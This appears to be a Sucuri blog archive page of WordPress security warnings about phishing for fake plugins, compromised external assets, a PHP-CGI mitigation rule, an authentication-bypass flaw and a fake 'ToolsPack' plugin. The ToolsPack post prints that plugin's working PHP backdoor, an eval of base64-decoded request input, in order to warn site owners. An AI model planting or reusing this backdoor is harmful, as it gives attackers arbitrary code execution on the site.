Phishing Emails to Install Malicious WordPress Plugins

When all else fails, the bad guys can always rely on some basic social engineering tactics with a little hit of phishing!!

Over the weekend, a few of our clients received a very suspicious email telling them to download a new version of the popular “All in One SEO Pack” plugin for WordPress. What a win, right? It wasn’t just the plugin, but the Pro version too. To top it off, it was for Free!!! This is where the journey begins…

Happy Black Friday / Cyber Monday


Read More

Free Sucuri WordPress Plugin Gets New Features

We just released some major updates to our Free WordPress plugin that we recommend all WordPress users check out.

Before the update, the plugin was just a simplified way to reach and scan a site using Sitecheck, now it is doing a lot more:

Sucuri WP Plugin

Read More

Sucuri SiteCheck Malware Scanner Plugin for WordPress

If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.

Sucuri Security - SiteCheck Malware Scanner

Read More

Sociable WordPress Plugin Security Warning

If you are using the Sociable WordPress Plugin (plugin with 1,777,161 downloads), be very careful when visiting the plugin’s page settings. We recommend that you disable it or remove it for now, at least until it gets fixed.

A customer alerted us to the issue, when you visit the settings page (e.g., site.com/wp-admin/options-general.php?page=sociable_select) you get a malware warning from Google (this site may harm your computer).

What is going on?


The issue is that the plugin is loading an image from a site that is currently compromised (inside this file: includes/class-sociable_Admin_Options.php):

http://balon24.com.ar/wp-content/plugins/sociable/images/Fueto_Sociable.png

That causes the browser to redirect to http://commitse.ru/ (known malware site). This is what happens when you load that image:

$ curl -D – -A “” http://balon24.com.ar/wp-content/plugins/sociable/images/Fueto_Sociable.png

HTTP/1.1 302 Found
Date: Fri, 07 Sep 2012 21:02:59 GMT
Server: Apache
Location: httx://commitse .ru
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1

There are some discussions on the WordPress forums about it here: http://wordpress.org/support/topic/plugin-sociable-image-causing-malware-detected-flags, but in the mean time, we recommend users delete or disable the plugin.

It doesn’t look like the plugin was compromised, just an external image was used and the site housing that image is currently compromised.

We will post more details when we have it.

Official WordPress Plugin Directory – Forcing Plugin Updates

For some while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen – no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is updates were forced – certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.

Read More

Sucuri WordPress Security Plugin Protects Against PHP-CGI Vulnerability

Today we released an update on the latest PHP CGI vulnerability and provided some additional information that users can use to help protect against it.

Guidance includes updating your .htaccess file with the following:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? – [F,L]

It is important to note however that if you are on WordPress and currently using our Free security plugin you are protected. We are actively seeing the attack across our growing network of plugin users and proactively pushing changes to protect our users.
Read More

Sucuri Security WordPress Plugin Free To Clients: Getting Proactive with Web Malware

We are happy to announce that our premium WordPress plugin is now for free to all our existing and new clients. The plugin is a great compliment to our malware scanning and remediation services and provides a large array of features designed to help you combat the growing web malware problem.

Note: the plugin is available under all our existing plans for all our users.

We have started to get questions that ask whether this is the only plugin required for all your security needs, the answer is “no”. It is meant to compliment your arsenal and help you become more proactive when it comes to securing your WordPress instance.


Read More

Vulnerability in the Absolute Privacy Plugin

We are seeing reports that a vulnerability in the Absolute Privacy WordPress plugin (link) is being used to hack and compromise sites with it installed.

This plugin has a serious unpatched security vulnerability that allows anyone to login in the WordPress site without a password. From Secunia:

Schaffnern has discovered a vulnerability in the Absolute Privacy plugin for WordPress, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to an error within the “abpr_authenticateUser()” function in wp-content/plugins/absolute-privacy/functions.php, which prevents the password from being verified. This can be exploited to bypass the authentication mechanism and gain administrative access to the application.

The vulnerability is confirmed in version 2.0.5. Other versions may also be affected.

Note that this plugin has had more than 35 thousand downloads and no patches for this bug. We recommend deleting this plugin asap until a fix is in place.

Our team is still analysing this vulnerability and we will post more details soon. Additional information and original report was found here.


If you think your site has been compromised, you can verify it in here: http://sitecheck.sucuri.net

New WordPress ToolsPack Plugin

We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.

They have installed a plugin called ToolsPack ( ./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”

Interesting…

However, when we look at the plugin code, all it does is this:

<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>

If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!

How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.

Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.

Have you seen this plugin, or something like it? make sure to leave a comment with your experience.


Site is hacked? Not sure? Check here http://sitecheck.sucuri.net

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.

Read More